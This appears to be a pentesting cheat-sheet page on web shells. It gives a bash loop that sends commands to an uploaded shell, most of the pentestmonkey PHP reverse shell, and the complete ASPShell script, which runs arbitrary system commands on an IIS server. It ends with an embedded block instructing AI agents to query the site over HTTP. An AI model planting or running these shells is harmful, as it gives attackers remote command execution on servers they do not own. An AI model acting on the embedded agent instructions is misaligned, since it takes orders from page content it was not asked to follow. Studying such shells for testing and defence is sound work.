# Web Shells ### Simple bash script to handle basic webshell ```bash #Save next onliner as cli.sh while true;do read -p "[>] :~$ " cmd;curl $1$cmd;done #Usage: ./cli.sh http://target.com/path/to/shell.php?0= ``` ### PHP - Basic ```bash #Simple Webshell - system #Simple Webshell - passthru #Tiny Webshell ``` ### PHP - pentestmonkey php revshell ```php array("pipe", "r"), // stdin is a pipe that the child will read from 1 => array("pipe", "w"), // stdout is a pipe that the child will write to 2 => array("pipe", "w") // stderr is a pipe that the child will write to ); $process = proc_open($shell, $descriptorspec, $pipes); if (!is_resource($process)) { printit("ERROR: Can't spawn shell"); exit(1); } stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0); printit("Successfully opened reverse shell to $ip:$port"); while (1) { if (feof($sock)) { printit("ERROR: Shell connection terminated"); break; } if (feof($pipes[1])) { printit("ERROR: Shell process terminated"); break; } $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); if (in_array($sock, $read_a)) { if ($debug) printit("SOCK READ"); $input = fread($sock, $chunk_size); if ($debug) printit("SOCK: $input"); fwrite($pipes[0], $input); } if (in_array($pipes[1], $read_a)) { if ($debug) printit("STDOUT READ"); $input = fread($pipes[1], $chunk_size); if ($debug) printit("STDOUT: $input"); fwrite($sock, $input); } if (in_array($pipes[2], $read_a)) { if ($debug) printit("STDERR READ"); $input = fread($pipes[2], $chunk_size); if ($debug) printit("STDERR: $input"); fwrite($sock, $input); } } fclose($sock); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); function printit ($string) { if (!$daemon) { print "$string\n"; } } ?> ``` ### ASP.NET ```aspnet <%@ Language = "JScript" %> <% /* ASPShell - web based shell for Microsoft IIS Copyright (C) 2007 Kurt Hanner This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA http://aspshell.sourceforge.net */ var version = "0.2 (beta) [2007-09-29]"; var homepagelink = "http://aspshell.sourceforge.net"; var q = Request("q")(); var cd = Request("cd")(); if (q) { var command = ""; var output = ""; if (q.length == 0) { q = ":"; } command = "" + q; if (command == "?") { output = " ? this help page\n" + " :sv all server variables\n" + " execute any shell command\n"; } else if (command.toLowerCase() == ":sv") { var sv = ""; var svvalue = ""; var esv = new Enumerator(Request.ServerVariables); for (; !esv.atEnd(); esv.moveNext()) { sv = esv.item(); output += sv; output += ": "; svvalue = "" + Request.ServerVariables(sv); if (svvalue.indexOf("\n") >= 0) { output += "\n"; var svitems = svvalue.split("\n"); for (var i=0; i 0) { output += " "; output += svitems[i]; output += "\n"; } } } else { output += svvalue; output += "\n"; } } } else if (command.toLowerCase() == ":cd") { var fso = new ActiveXObject("Scripting.FileSystemObject"); output = fso.GetAbsolutePathName("."); } else if (/^:checkdir\s(.*)?$/i.test(command)) { var newdirabs = ""; var newdir = RegExp.$1; var fso = new ActiveXObject("Scripting.FileSystemObject"); var cdnorm = fso.GetFolder(cd).Path; if (/^\\/i.test(newdir)) { newdirabs = fso.GetFolder(cd).Drive + newdir; } else if (/^\w:/i.test(newdir)) { newdirabs = fso.GetAbsolutePathName(newdir); } else { newdirabs = fso.GetAbsolutePathName(fso.GetFolder(cd).Path + "\\" + newdir); } output = fso.FolderExists(newdirabs) ? newdirabs : "fail"; } else { var changedir = ""; var currdrive = ""; var currpath = ""; var colonpos = cd.indexOf(":"); if (colonpos >= 0) { currdrive = cd.substr(0, colonpos+1); currpath = cd.substr(colonpos+1); changedir = currdrive + " && cd \"" + currpath + "\" && "; } var shell = new ActiveXObject("WScript.Shell"); var pipe = shell.Exec("%comspec% /c \"" + changedir + command + "\""); output = pipe.StdOut.ReadAll() + pipe.StdErr.ReadAll(); } Response.Write(output); } else { var fso = new ActiveXObject("Scripting.FileSystemObject"); var currentpath = fso.GetAbsolutePathName("."); var currentdrive = fso.GetDrive(fso.GetDriveName(currentpath)); var drivepath = currentdrive.Path; %> Web Shell
ASPShell - Web-based Shell Environment Version <%=version%>
Copyright (c) 2007 Kurt Hanner, <%=homepagelink%>

<% } %> ``` ### b347k (PHP) webshell {% embed url="" %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://www.pwny.cc/shells/webshells.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.